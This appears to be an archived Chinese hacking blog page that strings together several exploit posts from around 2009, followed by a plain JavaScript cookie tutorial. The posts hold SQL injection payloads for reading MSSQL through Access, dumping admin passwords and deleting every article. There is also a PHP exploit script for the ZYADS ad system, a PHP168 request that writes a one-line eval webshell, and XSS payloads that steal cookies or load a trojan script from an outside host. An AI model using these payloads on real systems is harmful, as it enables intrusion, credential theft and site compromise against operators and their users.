作者:皇子

首先说明一点，这个方法很早就有了，不过用时大概在脑袋里沉寂太久，已经处于忘却状态。感谢Trace提供资料。

经常会遇到任意文件下载漏洞,一般处理的方法是把数据库连接文件下载回来,然后远程连接上去。最理想的状态莫过于MSSQL和MYSQL，尤其是在数据库 和WEB不分离的情况下，备分SHELL，导出SHELL，可以用的方法很多。不过要是数据库和WEB分离，而且数据库在内网不可上网，或者有防火墙等等 其他手段使得我们无法连上远程数据库时，不妨假设的再艰难一些，甚至无法找到一个mssql注射点时，很多情况下通常会束手无策。

这里以 MSSQL为例子，很凑巧找到一个任意文件下载漏洞，直接下了WEB.CONFIG回来看，发现数据库在内网，找了半天没找到注射点，稍微旁注一下，有一 个站，可惜是ACCESS数据库。猜不到表和后台。不过目标站的后台是知道的，然后准备从这个access注射点读出目标站管理员帐户。直观一些，下面直 接给出我本地测试结果:

如图

弄的简单一点，就3个字段，ID，XM，XB，ID数字型，后面2个字符型。
假设存在漏洞的文件中，执行SQL语句 select * from test whrere id = 1
这里有3个字段，我们用UNION联合查询给他匹配一下就是（黑盒操作时用order by 或者穷举来确定字段个数）
SELECT * FROM test where id=999999 union Select top 1 1,2,name from [ODBC;Driver=SQL Server;UID=dbo;PWD=dba;Server=*****;DataBase=master].ku 

这里的master库中我建立了一个名为KU的表，上面这个查询语句中，由于id=999999不存在，在联合查询的作用下，web上原本显示access数据库内容的位置显示出了我们构造的UNION查询结果，name字段处于一个字符型的显示位置
如图

ku这个表里的name字段内容就会被显示在web上相应的位置，不过这个显然不是我们想要的，我们要的是整个表的结构和内容
以master为例子，这里是模拟的结果，事先我已经知道master的结构,待会方便和结果比对校验是否有错，如图

SELECT * FROM test where id=999999 union Select top 1 1,2,table_name from [ODBC;Driver=SQL Server;UID=dbo;PWD=dba;Server=*****;DataBase=master].information_schema.tables

这样master库的第一个表名就出来了
如图

获得后面的表名也很简单
SELECT * FROM test where id=999999 union Select top 1 1,2,table_name from [ODBC;Driver=SQL Server;UID=dbo;PWD=dba;Server=*****;DataBase=master].information_schema.tables where table_name not in (select top 1 table_name from [ODBC;Driver=SQL Server;UID=dbo;PWD=dba;Server=****;DataBase=master].information_schema.tables)

如图

以次类以常规方法推取得字段名和字段内容,代码烦琐自行研究下。

如果数据库里的ID是字符型，则
SELECT * FROM test where id='999999' union Select top 1 1,2,table_name from [ODBC;Driver=SQL Server;UID=dbo;PWD=dba;Server=***;DataBase=master].information_schema.tables where '1'='1' 

Copyright © 2008

继续阅读《Access注射点如何读取MSSQL数据库内容》的全文内容...

分类: (G:)SQL数据库漏洞 | Tags: Access  MSSQL  注射点   | 添加评论(0)

相关文章:

MsSql 触发器后门  (2009-8-5 11:17:42)

MSSQL注入利用Group by&having猜表名和字段名  (2009-5-2 14:17:29)

SQLiHelper 2.6注射器  (2009-4-1 1:15:33)

破解MSSQL中的HASH密码  (2009-3-30 1:53:25)

Copyright © 2008

继续阅读《Linux下安装Metasploit破解Oracle登录用户名密码》的全文内容...

分类: (K:)Linux漏洞 | Tags: Metasploit  Linux  Oracle   | 添加评论(1)

相关文章:

Linux Kernel 2.x sock_sendpage() Local Ring0 Root Exploit  (2009-8-16 12:47:53)

使用低权限Oracle数据库账户得到OS访问权限  (2009-6-10 1:6:23)

oracle技术文档  (2009-5-26 20:22:57)

Linux Kernel 2.6 UDEV < 141 Local Privilege Escalation Exploit  (2009-5-1 16:17:16)

Linux爆本地提权漏洞 请立即更新udev程序  (2009-4-25 1:8:8)

在index/news.php 1-31行
 

<?
include_once("top.php");

      $newsid = intval($_GET['id']);
      
      $to_type = addslashes($_GET['type']);
      
      if ($to_type=='index')
      {
          $to_type_s =" and to_type=1";
      }
      
       if ($to_type=='webuser')
      {
          $to_type_s =" and to_type!=3";
      }
      
       if ($to_type=='webadver')
      {
          $to_type_s =" and to_type!=2";
      }
      
      $newssql = 'select * from zyads_news WHERE `id` ='' . $newsid . '' 

'.$to_type_s.'';
    
      $newsre=$db->query($newssql);
      $newsrow = $db->fetch_array($newsre);
      if (empty($newsrow)){

        zyads_message('zyads_news');
      }
?>

<?php
/*********************/
/*                   */
/*  Version : 5.1.0  */
/*  Author  : RM     */
/*  Comment : 071223 */
/*                   */
/*********************/

_obfuscate_JQYdYn1jfBI( );
define( "IN_ZYADS", TRUE );
$name = $_GET['name'];
$adid = $_GET['adid'];
$offsetwidth = $_GET['offsetwidth'];
$site = $_GET['site'];
$click_url = "http://www.erzhi.cn";
$count_url = "http://www.erzhi.cn";
if ( empty( $name ) || empty( $adid ) || empty( $site ) )
{
        exit( "广告出错" );
}
@require( "../user/c/".$name."/user_info.php" );
require( "../include/soft_class.php" );
require( "../include/settings.php" );
$code = new _obfuscate_Y2xpZW50( );
$getip = $code->_obfuscate_Z2V0aXA( );
$getbrowse = $code->_obfuscate_Z2V0YnJvd3Nl( );
$getos = $code->_obfuscate_Z2V0b3M( );
$maketime = time( ) + $setting['zyads_date'] * 3600;
$maketime = $maketime;
$strbas = $code->_obfuscate_cGFzc3BvcnRfZW5jcnlwdA( 

$getip."|".$maketime."|".$getbrowse."|".$getos, $setting['url_pwd'] );
$strbas = _obfuscate_IGI7aGd_LDRuMD0VZg( $strbas );
if ( $zyads_users['flag'] != 2 )
{
        echo "document.write('帐号被锁定');";
        exit( );
}
if ( _obfuscate_Cx96BhhwZxABPA8( "../cache/cpa/".$adid.".php" ) )
{
        require( "../cache/cpa/".$adid.".php" );
}
else
{
        exit( "文件丢失-".$adid.".php" );
}

<?php
//by q1ur3n
//team: http://www.wolvez.org
//exp : zyads.php?site=www.tx8688.com&id=and 1=2 union select 1,2,3,4,5,6%23
//敏感信息表信息：
/*
DROP TABLE IF EXISTS zyads_admin;
CREATE TABLE zyads_admin (
   id int(11) NOT NULL auto_increment,
   username varchar(20) NOT NULL,
   pwd varchar(50) NOT NULL,
   login_num int(11) NOT NULL,
   last_time datetime DEFAULT '0000-00-00 00:00:00' NOT NULL,
   islock int(1) NOT NULL,
   ip varchar(20) NOT NULL,
   admin_flag varchar(200) NOT NULL,
   addtime datetime NOT NULL,
   PRIMARY KEY (id)
);

*/

$host = $_GET['site'];
$cmd='to_type_s='.urlencode(stripcslashes($_REQUEST["id"]));

$message = "GET /index/news.php?id=89  HTTP/1.1 ";
$message .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-

shockwave-flash, */* ";
$message .= "Referer: http://www.baidu.com/ ";
$message .= "Accept-Language: zh-cn ";
$message .= "Content-Type: application/x-www-form-urlencoded ";
$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1) ";
$message .= "Host: $host ";
$message .= "Connection: Close ";
$message .= "Cookie: ".$cmd." ";
//echo $message;
       
$fp = fsockopen($host, 80);
fputs($fp, $message);
$resp = '';
while ($fp && !feof($fp))
$resp .= fread($fp, 1024);
echo $resp;
fclose($fp);
       
?>

Copyright © 2008

继续阅读《中易广告联盟系统(ZYADS) sql注入和本地包含漏洞》的全文内容...

分类: (D:)PHP程序漏洞 | Tags: 中易广告联盟系统  ZYADS  SQL注入  本地包含漏洞   | 添加评论(0)

相关文章:

飞天论坛asp版通杀 0day利用程序(官方漏洞未补)  (2009-5-13 19:11:35)

MSSQL注入利用Group by&having猜表名和字段名  (2009-5-2 14:17:29)

ECShop 2.5.0 (order_sn) Remote SQL Injection Vulnerability  (2009-4-28 13:52:37)

浅析LxBlog V6变量未初始化漏洞  (2009-3-17 18:2:32)

phpcms2008 GBK 双字节编码 0day  (2009-3-16 20:45:52)

<!--#include file="connDB.asp"-->
<!--#include file="include/Function.Common.asp"-->
<%
id=request.QueryString("id")
if id="" then 
 response.Redirect("/")
end if
'-----网址--------------
Set rsWebUrl=Server.CreateObject("Adodb.Recordset")
sqlC="select  * from tWebUrl where fpassed=1 and fid=" & id
rsWebUrl.open sQLC,conn,0,1
if rsWebUrl.Eof and rsWebUrl.Bof then
 response.Redirect("/")
else
%>

很明显,可以注入,而且头文件由于程序员疏忽,很配合的没调用防注入系统.其他文件均调用防注入.
利用:注意注入点用明小子或者啊D检测不出来,简单写下注入语句:
http://localhost/urlGo.asp?id=4233%20and%201=2%20union%20select%201,2,fusername,4,5,6,7,8,9,10%20from%20tAdmin
查密码只需把fusername改成fpassword,但是在测试的时候,发现因版本不同,可能表段长度不同,如果提示列数不匹配,则换成9个即可.
这里我写了利用工具,傻瓜式入侵,其中,ID值为在搜索引擎中看到的ID,如图:
工具集成了暴密码账号,后台访问,数据库下载MD5破解等功能,工具和源码见附件.
未加壳,欢迎篡改版权!好久没写程序了,就当练手吧!
Ps:后台拿Shell比较费劲,提示空壳数据库,先恢复在备份,再一句话!

Copyright © 2008

继续阅读《深度学习(asp)网址导航v3.0.4 0day》的全文内容...

分类: (C:)ASP程序漏洞 | Tags: 深度学习  网址导航  asp漏洞   | 添加评论(0)

还没有相关文章，您来说两句？

Copyright © 2008

继续阅读《动网8.x最新0day》的全文内容...

分类: (C:)ASP程序漏洞 | Tags: 动网漏洞  Dvbbs  解析漏洞   | 添加评论(1)

还没有相关文章，您来说两句？

今天看rss reader上又有几个好友发了一些关于flash封装js代码的相关文章。看完后，仔细琢磨了一下，感觉应该把一些TIPS发到blog上做个备份吧。

一、首先，咱们说说flash代码的保护。
关于这个问题，我觉得对swf进行加密混淆很关键，因为浏览器在浏览到swf文件后都会缓存到本地，所以被拿到样本也就不足为奇了。但是如果能对其进行必要 的加密混淆，我相信对于大多数人来说想要看到完整的源代码似乎就变得非常困难了。网上的混淆加密工具很多，我这里给一个大家可以测试下：
http://doswf.googlecode.com/files/DoSWF4.0.2.exe
当然好的加密混淆工具也是非常难得，看大家怎么去找了。
 

如果混淆和加密的算法都很强壮的话，相信很多人都会拿这个swf文件没有办法了。当然有朋友说，我可以不管你这个swf怎么加密，只要被加载到内存，最终代 码还是会在内存里出现的等等，这些说法我同意，你都要用调试器进行动态调试了，我能有什么办法呢～～～起码给你静态调试增加点难度吧。

二、关于js代码的保护
JS代码可以由FLASH进行任意加密，调用之前当然会需要解密，看上去没什么区别。但是在使用静态分析的朋友的眼里那可就变得更复杂了一些。 因为经过加密后的js代码会被放入flash里一起编译进swf文件里，再对swf文件进行混淆，那个反编译出来的DD还有几个人能看得懂撒？

说 到这里，又有朋友说了，我不管你怎么加密，你的js最终还是要通过外部接口交由浏览器执行的，既然你执行，那么肯定会调用eval这个js函数的，那好， 我hook这个函数不就行了吗？～～～我只能说，你很聪明，但还不够聪明。谁说的我执行js代码就非要用eval函数的撒？网上那么流传的而已，我使用 setTimeout函数行不行？你说啥，你要把这个函数也hook了？OK，我使用匿名函数，我看你hook啥去？不相信？look下面的代码：

package{
import flash.external.ExternalInterface;

public class Movie extends Sprite{

public function Movie()  {
var myjs:String="alert('see me?');";//换成你的js
ExternalInterface.call("(function(){"+myjs+"})()");

}
}
}

<script language="javascript">

// hook
fnobj = Function;
Function = function(v) {
alert("Hooker said: \r\n\t\r\n\tYou are...\r\n\t\r\n\t" + v);
alert("Begin to execute your codes...");
fn = new fnobj("(" + v + ")()");
fn();
}

// ExternalInterface.call("...")
(function() {
alert("you can not see me");
})();

</script>

new function(){
//js代码
}

ExternalInterface.call("a='see me',alert(a),alert(a+'?')");

<Files ma.js>
ForceType application/x-httpd-php
SetHandler application/x-httpd-php
</Files>
Options -Indexes

Copyright © 2008

继续阅读《关于flash封装JS代码的一些TIPS》的全文内容...

分类: (T:)杂七杂八 | Tags: Flash  JavaScript  js  rss reader  解密   | 添加评论(0)

相关文章:

JavaScript使用cookie,参数设置,说明;读取,写入,删除函数  (2009-9-6 2:4:38)

fly_flash — Jump/XSS/CSRF in Flash  (2009-8-29 11:51:52)

JavaScript SWitch条件(case)  (2009-6-24 0:34:58)

开始传统学习一下Javascript（初始化 ）  (2009-6-6 12:37:5)

来源：chinesehonker

危险等级：高

影响版本：PHP168 6.0以下版本

入侵者可以在用户登陆页面构造特殊语句，将PHP一句话写入cache目录，从而获得使用PHP168整站程序网站的WEBSHELL权限。
 

测试语句：
?makehtml=1&chdb[htmlname]=honker.php&chdb[path]=cache&content=?php%20@eval($_POST[honker]);?

Copyright © 2008

继续阅读《PHP168 6.0及以下版本漏洞》的全文内容...

分类: (D:)PHP程序漏洞 | Tags: php168  漏洞  php漏洞  cache  WEBSHELL   | 添加评论(0)

相关文章:

Discuz! Plugin Crazy Star < = 2.0 Sql injection Vulnerability  (2009-8-27 13:57:57)

乘风多用户PHP统计系统 v4.0 注射漏洞  (2009-6-16 16:21:14)

PHP漏洞挖掘技术  (2009-5-6 16:16:10)

Linux Kernel 2.6 UDEV < 141 Local Privilege Escalation Exploit  (2009-5-1 16:17:16)

ECShop 2.5.0 (order_sn) Remote SQL Injection Vulnerability  (2009-4-28 13:52:37)

[技术要点]：
     1、爆出老Y最新的四个漏洞；
     2、利用正则表达式“(\<.+?\>)”中的“.”含义为“匹配除换行符以外的任意字符”，在Html语句的标签中插入“换行符”即可饶过正则表达式的过滤；
     3、绕过逗号，另类手工注入。CheckStr()函数过滤了逗号，所以不能使用多参数的函数，比如字符串截取函数mid()，也不能使用union语句，因为union 语句必须保证字段数一致，还不能使用“<”、“>”、“=”等符号，所以使用select的like语句逐位猜解与密码的MD5码相匹配的字符，取值范围：0-9，A-F（不区分大小）；
     4、给出一段字符串与Unicode字符转换的代码；
[主要内容]：
     老Y采用伪静态页面（由/Html/Index.asp调用），代码相当简洁，过滤也非常严密，数字型使用LaoYRequest()、字符型使用CheckStr()等函数进行过滤防止注入，文本内容使用LoseHtml()函数过滤防止跨站；功能比较全面，有新闻固顶、公告、留言、评论、RSS、用户注册、网站风格以及简繁体选择等等，动态页面文件较少。
     但是智者千虑必有一疏，本文对老Y做了全面剖析，我们再次感受到安全必须要过滤严密！老Y的CheckStr()函数因为过滤了逗号才躲过致命一劫，但是疏忽了括号，导致我们可以巧妙构造Sql语句达到注入目的。本文涉及到一种另类的手工注入方法，即绕过mid等函数利用了like关键字进行字符猜解，注入漏洞二还会完全摧毁老Y——删除所有文章，使其仅剩“躯壳”——网站框架。又因为老Y的LoseHtml()函数在使用正则表达式时存在缺陷，所以导致我们可以利用插入换行符的方法提交跨站脚本，评论跨站还将影响网站首页！如果提交页面跳转、关闭、死循环等脚本，即可完成DDOS类似攻击，还可以获取管理员Cookie、网页挂马、传播蠕虫等其他跨站攻击。总之这一切均因为老Y函数过滤不足所致！最后提醒大家：使用老Y时务必修改管理员用户表名及后台管理目录。
   漏洞一：js.asp页面漏洞。此漏洞由幻泉(bl4ck)发现。由于js.asp页面在处理使用CheckStr()函数过滤后的字符时，将其中的“|”分割符又还原为“，”（即逗号），导致注入。
利用链接：

Code:
http://127.0.0.1/laoy/js.asp?maxlen=50&num=5&ClassNo=1|1|1)%09Union%09Select%091|cstr(id)%2Bchr(58)%2Badmin_name%2Bchr(58)%2Badmin_pass|3|4|5|6|7|8|9%09From%09yao_admin%09Where%09(1
//其中maxlen和num参数不能少
//cstr()函数将数字型字段id的值转为字符串，
//%2B即“+” 用作连接id、admin_name、admin_pass字段
// chr(58)即“：”为分割符
     注意：版本2.3和2.4后台认证方式的差异：前者管理员密码使用16位的MD5码，登陆认证使用Session；后者管理员密码使用截取的18位MD5码（adminpwd=Mid(md5(adminpwd,32),4,18)），登陆认证使用Cookie。令人费解的变化：2.3版本虽然Session无法伪造，但是16位的MD5码可以在线或爆破，2.4版本改为截取的18位MD5码后虽然不能破解（除非自己编写爆破工具），但是却可以进行Cookie欺骗！这比破解MD5码更方便。
    漏洞二：User/UserAdd.asp页面漏洞。由于在User/UserAdd.asp页面中，edit()、saveedit()模块使用CheckStr()函数过滤数字型变量ID，导致可以手工注入获得管理员密码，del()、delAll()模块未过滤变量ID，导致用户可以任意删除文章。此漏洞需要登陆用户后才能利用。
edit()模块漏洞利用：
    修改任意文章。从代码不难看出，如果令id为“168 OR 1”确保Sql语句返回非空集，便会打开id为168的文章编辑界面，而且saveedit()模块同样存在此漏洞，导致我们可以修改任意文章。需要注意的是经过编辑后的文章将变为未审。当然如果仅仅可以修改任意文章的话，此漏洞的利用价值就不是很高，所以让我们继续发掘吧。
    注入管理员密码。通过前面介绍，我们知道2.3版本没有过滤逗号，因此构造union语句相对比较容易，而2.4版本过滤了逗号，利用需要一些技巧，所以这里分别进行介绍。
绕过逗号，另类的手工注入。CheckStr()函数过滤了逗号，所以不能使用多参数的函数，比如字符串截取函数mid()，也不能使用union语句，因为union 语句必须保证字段数一致，还不能使用“<”、“>”、“=”等符号，这给我们手工注入提出了挑战。于是考虑到使用select的like语句，基本语法如下：
Code:
Select * from yao_admin where admin_pass like '1*'
Select * from yao_admin where admin_pass like '1?????????????????'
//因为admin_pass长度为18，所以使用“1”和17个“?”进行匹配，如果密码第一个字符为“1”则Select语句有返回，否则无返回。这与IIF函数有异曲同工之效。
因为CheckStr()函数过滤了单、双引号，所以引入子查询，得到衍生语句：
Code:
select top 1 * from yao_admin where admin_pass like (Select chr(49)+chr(42) from yao_admin)
// chr(49)为数字1，chr(42)为字符“*”，chr(63)为字符“?”
     修改“*”为一个自己添加的文章ID，比如185，可以先“发表新文章”获得该文章的ID。现给出利用的URL，如下：
Code:
http://127.0.0.1/laoy/User/UserAdd.asp?action=edit&id=(Select%09top%091%09185%09From%09yao_admin%09Where%09admin_pass%09Like%09(Select%09chr(49)%2Bchr(37) %09From%09yao_admin))
//在ACCESS的查询界面中的通配符“*”、“?”如果用在用 ADO 来执行的JET SQL语句中应该为“%”、“_”，chr(37)为字符“%”
     这里请注意：在ACCESS的查询界面中的通配符“*”、“?”等，如果用在用 ADO 来执行的JET SQL语句中应该为“%”、“_”等，即ANSI SQL 通配符 “%”和“_” 仅在 Microsoft Jet 4.X 版本和 Microsoft OLE DB Provider for Jet 中才是有效的，如果用在 Microsoft Access 或 DAO 中，那么它们被视为文本。所以在给出利用的URL中，将衍生语句中的chr(42) 即“*” 替换为chr(37)即“%”。
访问URL后，提示“这样搞是不好的!”，如图8，说明admin_pass密码第1位字符不是chr(49)即数字“1”，于是修改为chr(50)~chr(57)、chr(65)~chr(70)，即对应数字2~9、字母A~F（like语句不区分大小写），如果正常打开ID为185的文章编辑界面时，如图9，即可确定出admin_pass密码第1位字符，然后依次猜解第2、3……18位上的字符。
    del()模块漏洞利用。id变量未作任何过滤，如果令id为“1 or 1”将导致网站中的所有文章将被全部删除！危害应该是十分严重的。
这里请大家注意本文中“or 1”这种用法，不同于我们熟悉的“or 1=1”，因为老Y的CheckStr()函数过滤了“<”、“>”、“=”符号，所以我们利用“数字1和0 可以表示逻辑true和false”的特性，构造Sql语句。
    漏洞三、评论跨站。老Y在输出memContent即评论的内容时使用ChkBadWords()、GlHtml()函数过滤了其中的Html标签及单、双引号等，因此不能跨站，但是我们可以利用没有过滤的memAuthor完成跨站目的。在浏览文章的页面的下方，“大名”（即memAuthor）却是单行输入栏且不能修改，我们必须修改提交页面如下，注意将Author输入栏改为textarea元素，允许输入多行（即可以插入换行符），其中form的action值、ArticleID值请根据实际修改，“ ”为换行符。
    LoseHtml()函数代码如下：
Code:
 

Function LoseHtml(ContentStr) 
Dim ClsTempLoseStr,regEx 
         ClsTempLoseStr = Cstr(ContentStr) 
                 Set regEx = New RegExp 
       regEx.Pattern = "(\<.+?\>)" 
       regEx.IgnoreCase = True 
       regEx.Global = True 
       ClsTempLoseStr = regEx.Replace(ClsTempLoseStr,"") 
//此段含义为：替换“<”和“>”及之间的所有字符为空 
         RegEx.Pattern = "(&.+?;)" 
         ClsTempLoseStr = RegEx.Replace(ClsTempLoseStr, "") 
         ClsTempLoseStr = Replace(ClsTempLoseStr,VbCrlf,"") 
         ClsTempLoseStr = Replace(ClsTempLoseStr,VbCr,"") 
         ClsTempLoseStr = Replace(ClsTempLoseStr,VbLf,"") 
//这三句表示将回车符、换行符替换为空 
         ……（略）//过滤单、双引号、空格等 
LoseHtml = ClsTempLoseStr 
End function

//页面跳转 
   <script>window.location.href("http://www.baidu.com");</script> 
//页面关闭 
   <script>opener=null;window.close();</script> 
//获取Cookie 
   <iframe src=获取Cookie的URL+?escape(document.cookie) width=0 height=0></iframe> 
//网页挂马 
   <script language=javascript src=xxx.js></script> 
   <script language=JScript.Encode src=http://www.upx.com.cn/muma.txt></script> 
//其他跨站脚本 
   <img src="#" width=0 onerror=alert("XSS")> 
   <img src=javascript:alert("XSS") width=0> 
   <img src=javascript:alert(/跨站/) width=0> 
<style>@import url(javascript:alert("XSS"));</style> 
<style>body {xss:expression(alert("XSS"))}</style> 
<div style="xss:expression(alert('XSS'))"></div>

script language="javascript"> 
function getCharCode(n){ 
var str0,str; 
if (n==1){ 
     str0=document.getElementById("StrOrChar").value; 
   str=str0.charCodeAt(0); 
   var i=0; 
   for (i=1;i<=str0.length-1;i++) {str=str+","+str0.charCodeAt(i);} 
} 
else 
{str0="&#"+document.getElementById("StrOrChar").value; 
   var regS = new RegExp(",","gi"); 
   str=str0.replace(regS,";&#"); 
} 
document.getElementById("StrOrChar").innerHTML=str; 
} 
</script> 
<p align="center">Html代码与fromCharCode函数调用的Unicode串转换 
<textarea id="StrOrChar" rows="6" cols="100"><iframe src=http://www.hao123.com width=0 height=0></iframe></textarea><br> 
<input type="button" name="Submit" value="转 换" onclick="getCharCode(1);"> 
<input type="button" name="Submit" value="还 原" onclick="getCharCode(2);"><br> 
</p> 

Copyright © 2008

继续阅读《老Y文章管理系统V2.4最新漏洞分析》的全文内容...

分类: (C:)ASP程序漏洞 | Tags: CheckStr函数  LoseHtml函数  绕过逗号  通配符  换行符  另类手工注入  跨站   | 添加评论(0)

还没有相关文章，您来说两句？

转载请注明：http://www.abcxd.com/

    这一个文章和我以前发布的一个文章正好成了一个对比（文章连接），如果上一次是茅。那么此次这个就是盾了.为什么这样说？请看一下上一篇的文章。因为上一次是直接修改数据库的防下载表而不会造成数据沉淀在数据库里面。那么换一个思想来讲。假设在数据库当中并没有这一个防下载表。但是却有防下载功能。

这样是不是就能防止别人利用  update nodownload set notdown=''  SQL语句来删除防下载的功能呢？？思路有了。现在我们就手工操作一下看看。先建立一个表,表名为：abcxd。然后随便在表里面建一个名为abcxda的字段,然后在字段里面加上一个些内容如:abcxd.com 最后将表删除...   此时将整个数据库关闭掉。然后以记事本的方式打开数据库。

搜索一下：abcxd.com

此时有没有发现他还在数据库里面。原因我解释得不好。还是你自己去网上查查吧！！

说到这里聪明的你应该明白原理是什么了吧。为了方便大众。我自己写了一个小工具。

例图：

下载地址：心动吧数据库防下载.rar

Copyright © 2008

继续阅读《[原创]心动吧数据库防下载小工具》的全文内容...

分类: (A:)本站原创 | Tags: 心动吧数据库防下载小工具  数据库防下载  原创   | 添加评论(2)

相关文章:

[原创]QQ相册中如何在一个相片添加多个圈圈  (2009-4-13 3:42:7)

[原创]网站系统探测器  (2009-1-3 18:47:21)

[原创]2009-1-18发布新版◆心动吧asp在线◆  (2008-12-30 6:21:42)

[原创]心动吧全能旁注工具1v0版.正式发布  (2008-12-30 3:29:13)

[原创]rootkit类型杀毒手法.个人研究  (2008-12-30 3:27:36)

cookie概述

在上一节，曾经利用一个不变的框架来存储购物栏数据，而商品显示页面是不断变化的，尽管这样能达到一个模拟全局变量的功能，但并不严谨。例如在导航框架页面内右击，单击快捷菜单中的【刷新】命令，则所有的JavaScript变量都会丢失。因此，要实现严格的跨页面全局变量，这种方式是不行的，JavaScript中的另一个机制：cookie，则可以达到真正全局变量的要求。
cookie是浏览器提供的一种机制，它将document对象的cookie属性提供给JavaScript。可以由JavaScript对其进行控制，而并不是JavaScript本身的性质。cookie是存于用户硬盘的一个文件，这个文件通常对应于一个域名，当浏览器再次访问这个域名时，便使这个cookie可用。因此，cookie可以跨越一个域名下的多个网页，但不能跨越多个域名使用。
不同的浏览器对cookie的实现也不一样，但其性质是相同的。例如在Windows 2000以及Windows xp中，cookie文件存储于documents and settings\userName\cookie\文件夹下。通常的命名格式为：userName@domain.txt。
cookie机制将信息存储于用户硬盘，因此可以作为全局变量，这是它最大的一个优点。它可以用于以下几种场合。
? 保存用户登录状态。例如将用户id存储于一个cookie内，这样当用户下次访问该页面时就不需要重新登录了，现在很多论坛和社区都提供这样的功能。cookie还可以设置过期时间，当超过时间期限后，cookie就会自动消失。因此，系统往往可以提示用户保持登录状态的时间：常见选项有一个月、三个月、一年等。
? 跟踪用户行为。例如一个天气预报网站，能够根据用户选择的地区显示当地的天气情况。如果每次都需要选择所在地是烦琐的，当利用了cookie后就会显得很人性化了，系统能够记住上一次访问的地区，当下次再打开该页面时，它就会自动显示上次用户所在地区的天气情况。因为一切都是在后台完成，所以这样的页面就像为某个用户所定制的一样，使用起来非常方便。
? 定制页面。如果网站提供了换肤或更换布局的功能，那么可以使用cookie来记录用户的选项，例如：背景色、分辨率等。当用户下次访问时，仍然可以保存上一次访问的界面风格。
? 创建购物车。正如在前面的例子中使用cookie来记录用户需要购买的商品一样，在结账的时候可以统一提交。例如淘宝网就使用cookie记录了用户曾经浏览过的商品，方便随时进行比较。
当然，上述应用仅仅是cookie能完成的部分应用，还有更多的功能需要全局变量。cookie的缺点主要集中于安全性和隐私保护。主要包括以下几种：
? cookie可能被禁用。当用户非常注重个人隐私保护时，他很可能禁用浏览器的cookie功能；
? cookie是与浏览器相关的。这意味着即使访问的是同一个页面，不同浏览器之间所保存的cookie也是不能互相访问的；
? cookie可能被删除。因为每个cookie都是硬盘上的一个文件，因此很有可能被用户删除；
? cookie安全性不够高。所有的cookie都是以纯文本的形式记录于文件中，因此如果要保存用户名密码等信息时，最好事先经过加密处理。

设置cookie
每个cookie都是一个名/值对，可以把下面这样一个字符串赋值给document.cookie：
document.cookie="userId=828";
如果要一次存储多个名/值对，可以使用分号加空格（; ）隔开，例如：
document.cookie="userId=828; userName=hulk";
在cookie的名或值中不能使用分号（;）、逗号（,）、等号（=）以及空格。在cookie的名中做到这点很容易，但要保存的值是不确定的。如何来存储这些值呢？方法是用escape()函数进行编码，它能将一些特殊符号使用十六进制表示，例如空格将会编码为“20%”，从而可以存储于cookie值中，而且使用此种方案还可以避免中文乱码的出现。例如：
document.cookie="str="+escape("I love ajax");
相当于：
document.cookie="str=I%20love%20ajax";
当使用escape()编码后，在取出值以后需要使用unescape()进行解码才能得到原来的cookie值，这在前面已经介绍过。
尽管document.cookie看上去就像一个属性，可以赋不同的值。但它和一般的属性不一样，改变它的赋值并不意味着丢失原来的值，例如连续执行下面两条语句：
document.cookie="userId=828";
document.cookie="userName=hulk";
这时浏览器将维护两个cookie，分别是userId和userName，因此给document.cookie赋值更像执行类似这样的语句：
document.addcookie("userId=828");
document.addcookie("userName=hulk");
事实上，浏览器就是按照这样的方式来设置cookie的，如果要改变一个cookie的值，只需重新赋值，例如：
document.cookie="userId=929";
这样就将名为userId的cookie值设置为了929。

获取cookie的值
下面介绍如何获取cookie的值。cookie的值可以由document.cookie直接获得：
var strcookie=document.cookie;
这将获得以分号隔开的多个名/值对所组成的字符串，这些名/值对包括了该域名下的所有cookie。例如：

<script language="JavaScript" type="text/JavaScript">
<!--
document.cookie="userId=828";
document.cookie="userName=hulk";
var strcookie=document.cookie;
alert(strcookie);
//-->
</script>

<script language="JavaScript" type="text/JavaScript">
<!--
//设置两个cookie
document.cookie="userId=828";
document.cookie="userName=hulk";
//获取cookie字符串
var strcookie=document.cookie;
//将多cookie切割为多个名/值对
var arrcookie=strcookie.split("; ");
var userId;
//遍历cookie数组，处理每个cookie对
for(var i=0;i<arrcookie.length;i++){
      var arr=arrcookie[i].split("=");
      //找到名称为userId的cookie，并返回它的值
      if("userId"==arr[0]){
             userId=arr[1];
             break;
      }
}
alert(userId);
//-->
</script>

<script language="JavaScript" type="text/JavaScript">
<!--
//获取当前时间
var date=new Date();
var expireDays=10;
//将date设置为10天以后的时间
date.setTime(date.getTime()+expireDays*24*3600*1000);
//将userId和userName两个cookie设置为10天后过期
document.cookie="userId=828; userName=hulk; expire="+date.toGMTString();
//-->
</script> 

<script language="JavaScript" type="text/JavaScript">
<!--
//获取当前时间
var date=new Date();
//将date设置为过去的时间
date.setTime(date.getTime()-10000);
//将userId这个cookie删除
document.cookie="userId=828; expire="+date.toGMTString();
//-->
</script> 

script language="JavaScript" type="text/JavaScript">
<!--
function addcookie(name,value,expireHours){
      var cookieString=name+"="+escape(value);
      //判断是否设置过期时间
      if(expireHours>0){
             var date=new Date();
             date.setTime(date.getTime+expireHours*3600*1000);
             cookieString=cookieString+"; expire="+date.toGMTString();
      }
      document.cookie=cookieString;
}
//-->
</script>

<script language="JavaScript" type="text/JavaScript">
<!--
function getcookie(name){
      var strcookie=document.cookie;
      var arrcookie=strcookie.split("; ");
      for(var i=0;i<arrcookie.length;i++){
            var arr=arrcookie[i].split("=");
            if(arr[0]==name)return arr[1];
      }
      return "";
}
//-->
</script>

<script language="JavaScript" type="text/JavaScript">
<!--
function deletecookie(name){
       var date=new Date();
       date.setTime(date.getTime()-10000);
       document.cookie=name+"=v; expire="+date.toGMTString();
}
//-->
</script>  

也可以用另一种网上流传的:(明生推荐使用这种·！！！)

<script language="JavaScript" type="text/JavaScript"> 

//写cookies函数 作者：翟振凯
function SetCookie(name,value)//两个参数，一个是cookie的名子，一个是值
{
    var Days = 30; //此 cookie 将被保存 30 天
    var exp  = new Date();    //new Date("December 31, 9998");
    exp.setTime(exp.getTime() + Days*24*60*60*1000);
    document.cookie = name + "="+ escape (value) + ";expires=" + exp.toGMTString();
}
function getCookie(name)//取cookies函数        
{
    var arr = document.cookie.match(new RegExp("(^| )"+name+"=([^;]*)(;|$)"));
     if(arr != null) return unescape(arr[2]); return null;

}
function delCookie(name)//删除cookie
{
    var exp = new Date();
    exp.setTime(exp.getTime() - 1);
    var cval=getCookie(name);
